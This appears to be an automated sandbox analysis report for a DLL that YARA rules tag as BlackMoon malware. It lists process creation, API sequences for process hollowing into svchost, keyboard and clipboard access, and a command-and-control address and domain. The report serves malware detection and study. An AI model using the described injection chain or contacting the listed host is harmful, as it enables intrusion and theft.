Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp3_2_10007FFC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp3_2_10007FFC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp3_2_10007FFC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-4Ch], esp3_2_100045FC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-18h], esp4_2_1000300A
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-1Ch], esp4_2_1000300A
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-18h], esp4_2_1000300A
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp4_2_10001817
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp4_2_10001817
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp4_2_10001817
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp4_2_10001817
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp4_2_10001817
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp4_2_10001817
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp4_2_10001817
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp4_2_10001817
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp4_2_10001817
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp4_2_10001817
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp4_2_10001817
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp4_2_10001817
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp4_2_10001817
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp4_2_10001027
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp4_2_10005E5F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp4_2_10005E5F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp4_2_10005E5F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp4_2_10002D31
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp4_2_10002D31
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp4_2_10002D31
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp4_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-3Ch], esp4_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-40h], esp4_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-50h], esp4_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp4_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-4Ch], esp4_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp4_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-40h], esp4_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp4_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp4_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp4_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp4_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-54h], esp4_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-64h], esp4_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-64h], esp4_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-54h], esp4_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-40h], esp4_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp4_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp4_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp4_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp4_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp4_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp4_2_100013D3
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp4_2_100013D3
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp4_2_100013D3
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp4_2_100013D3
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-4Ch], esp4_2_10004606
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-4Ch], esp4_2_10004610
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-4Ch], esp4_2_1000461A
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-4Ch], esp4_2_10004624
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-4Ch], esp4_2_1000462E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-28h], esp4_2_1000283C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp4_2_10006272
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp4_2_10006272
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp4_2_1000667B
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp4_2_1000667B
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-10h], esp4_2_10008C8B
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp4_2_10008C8B
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp4_2_100068F2
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp4_2_10005F47
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-1Ch], esp4_2_10005F47
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-28h], esp4_2_10001F4E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp4_2_1000676C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp4_2_10005D6F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp4_2_10005D6F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp4_2_10007779
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-24h], esp4_2_10008779
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-24h], esp4_2_10008779
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-38h], esp4_2_10008779
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-34h], esp4_2_10008779
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-24h], esp4_2_10008779
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-24h], esp4_2_10008779
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp4_2_10006984
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp4_2_10007FBF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-08h], esp4_2_100065CF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp4_2_100061D0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-04h], esp4_2_100061D0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp4_2_10007FFC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp4_2_10007FFC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp4_2_10007FFC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-2Ch], esp4_2_10007FFC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then cmp dword ptr [ebp-4Ch], esp4_2_100045FC
Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then push esi7_2_0046D431
Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then push esi7_2_00433CB2

Networking

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 208.100.26.242 5658Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exeDomain query: 52eva.top
Snort IDS alert for network traffic
Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.4:56572 -> 8.8.8.8:53
Source: Joe Sandbox ViewASN Name: STEADFASTUS STEADFASTUS
Source: Joe Sandbox ViewIP Address: 208.100.26.242 208.100.26.242
Source: Joe Sandbox ViewIP Address: 208.100.26.242 208.100.26.242
Source: global trafficTCP traffic: 192.168.2.4:49695 -> 208.100.26.242:5658
Source: unknownDNS traffic detected: queries for: 52eva.top
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040741D WSARecv,7_2_0040741D
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004330C0 OpenClipboard,GetClipboardData,CloseClipboard,GlobalSize,GlobalFix,GlobalUnWire,CloseClipboard,7_2_004330C0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0048837D GetKeyState,GetKeyState,GetKeyState,GetKeyState,7_2_0048837D
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00486887 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,7_2_00486887
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0041F080 GetKeyState,GetKeyState,GetKeyState,GetKeyState,7_2_0041F080
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004317C0 GetKeyState,GetKeyState,GetKeyState,CopyRect,7_2_004317C0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00432F60 GlobalAlloc,GlobalFix,GlobalUnWire,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard,7_2_00432F60

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: 3.0.rundll32.exe.475e2dd.4.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 4.2.rundll32.exe.1000e2dd.1.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 0.3.loaddll32.exe.280e2dd.0.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 0.0.loaddll32.exe.1000e2dd.2.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 0.2.loaddll32.exe.280e2dd.1.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 0.0.loaddll32.exe.280e2dd.4.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 3.2.rundll32.exe.475e2dd.1.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 3.0.rundll32.exe.1000e2dd.2.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 0.0.loaddll32.exe.1000e2dd.5.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 3.0.rundll32.exe.475e2dd.1.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 3.3.rundll32.exe.475e2dd.0.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 4.3.rundll32.exe.aee2dd.0.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 3.0.rundll32.exe.1000e2dd.5.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 3.2.rundll32.exe.1000e2dd.2.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 4.2.rundll32.exe.aee2dd.0.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 0.2.loaddll32.exe.1000e2dd.2.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 0.0.loaddll32.exe.280e2dd.1.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 5iiXyNVCQ3.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
Source: 3.0.rundll32.exe.475e2dd.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 4.2.rundll32.exe.1000e2dd.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 0.3.loaddll32.exe.280e2dd.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 0.0.loaddll32.exe.1000e2dd.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 0.2.loaddll32.exe.280e2dd.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 0.0.loaddll32.exe.280e2dd.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 3.2.rundll32.exe.475e2dd.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 3.0.rundll32.exe.1000e2dd.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 0.0.loaddll32.exe.1000e2dd.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 3.0.rundll32.exe.475e2dd.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 3.3.rundll32.exe.475e2dd.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 4.3.rundll32.exe.aee2dd.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 3.0.rundll32.exe.1000e2dd.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 3.2.rundll32.exe.1000e2dd.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 4.2.rundll32.exe.aee2dd.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 0.2.loaddll32.exe.1000e2dd.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 0.0.loaddll32.exe.280e2dd.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3144 -s 616
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004186007_2_00418600
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004680807_2_00468080
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004520B07_2_004520B0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0044A1707_2_0044A170
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004661F07_2_004661F0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0045E2607_2_0045E260
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004282207_2_00428220
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004642C07_2_004642C0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004503507_2_00450350
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004164607_2_00416460
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004684F07_2_004684F0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004645F07_2_004645F0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004525807_2_00452580
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0044E7007_2_0044E700
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004527B07_2_004527B0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004668007_2_00466800
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004588D07_2_004588D0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00440AB07_2_00440AB0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00464BF07_2_00464BF0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00450B907_2_00450B90
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00466C7E7_2_00466C7E
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00458D707_2_00458D70
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00494D1E7_2_00494D1E
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00440DE07_2_00440DE0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00466ECE7_2_00466ECE
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0044EED07_2_0044EED0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00468E907_2_00468E90
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00478F667_2_00478F66
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00440F707_2_00440F70
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004650407_2_00465040
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004510A97_2_004510A9
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004631307_2_00463130
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004431DB7_2_004431DB
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004531F07_2_004531F0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004213207_2_00421320
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004453E07_2_004453E0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0047D40C7_2_0047D40C
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0043D4F07_2_0043D4F0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004515667_2_00451566
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004615607_2_00461560
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004675007_2_00467500
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0044350D7_2_0044350D
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0043B5907_2_0043B590
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0041F7407_2_0041F740
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0044D7007_2_0044D700
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0045D7C07_2_0045D7C0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004577A07_2_004577A0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004518517_2_00451851
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0045F9D07_2_0045F9D0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00443A727_2_00443A72
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00451A047_2_00451A04
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00419AE07_2_00419AE0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00485B2B7_2_00485B2B
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0044DC407_2_0044DC40
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00465C707_2_00465C70
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00451C7E7_2_00451C7E
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00457C1E7_2_00457C1E
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0042DC807_2_0042DC80
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00457E6E7_2_00457E6E
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00471EB07_2_00471EB0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00449F007_2_00449F00
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00443FD07_2_00443FD0
Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00473304 appears 110 times
Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 004719EB appears 41 times
Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00449940 appears 77 times
Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00484BEB appears 44 times
Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 004496C0 appears 39 times
Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00449530 appears 85 times
Source: C:\Windows\System32\loaddll32.exeCode function: String function: 1000B390 appears 37 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 1000B390 appears 74 times
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001817 GetModuleHandleA,NtAllocateVirtualMemory,NtReadVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,NtFreeVirtualMemory,0_2_10001817
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10003356 LocalSize,RtlMoveMemory,LocalSize,RtlMoveMemory,LocalSize,CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,LocalSize,LocalSize,RtlMoveMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,SetThreadContext,ResumeThread,WaitForSingleObject,CloseHandle,CloseHandle,0_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10001817 GetModuleHandleA,NtAllocateVirtualMemory,NtReadVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,NtFreeVirtualMemory,3_2_10001817
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10003356 LocalSize,RtlMoveMemory,LocalSize,RtlMoveMemory,LocalSize,CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,LocalSize,WaitForSingleObject,CloseHandle,CloseHandle,3_2_10003356
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10001817 GetModuleHandleA,NtAllocateVirtualMemory,NtReadVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,NtFreeVirtualMemory,4_2_10001817
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10003356 LocalSize,RtlMoveMemory,LocalSize,RtlMoveMemory,LocalSize,CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,LocalSize,WaitForSingleObject,CloseHandle,CloseHandle,4_2_10003356
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00484D30 NtdllDefWindowProc_A,7_2_00484D30
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040347E NtQueryInformationProcess,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,7_2_0040347E
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0048551D NtdllDefWindowProc_A,CallWindowProcA,7_2_0048551D
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004870D1 NtdllDefWindowProc_A,7_2_004870D1
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004858C5 wsprintfA,wsprintfA,GetClassInfoA,NtdllDefWindowProc_A,7_2_004858C5
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004858B5 wsprintfA,GetClassInfoA,NtdllDefWindowProc_A,7_2_004858B5
Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0041FD80 GetClassInfoA,NtdllDefWindowProc_A,7_2_0041FD80
Source: 5iiXyNVCQ3.dllStatic PE information: Section: .nsp1 ZLIB complexity 0.9981345387972548
Source: RarExt32.dll.3.drStatic PE information: Section: .nsp1 ZLIB complexity 0.9981345387972548
Source: 5iiXyNVCQ3.dllVirustotal: Detection: 92%
Source: 5iiXyNVCQ3.dllReversingLabs: Detection: 95%
Source: 5iiXyNVCQ3.dllMetadefender: Detection: 80%
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\5iiXyNVCQ3.dll"
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\5iiXyNVCQ3.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5iiXyNVCQ3.dll,unll
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\5iiXyNVCQ3.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\WINDOWS\system32\svchost.exe -K NetworkService
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\WINDOWS\system32\svchost.exe -K NetworkService
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\WINDOWS\system32\svchost.exe -K NetworkService
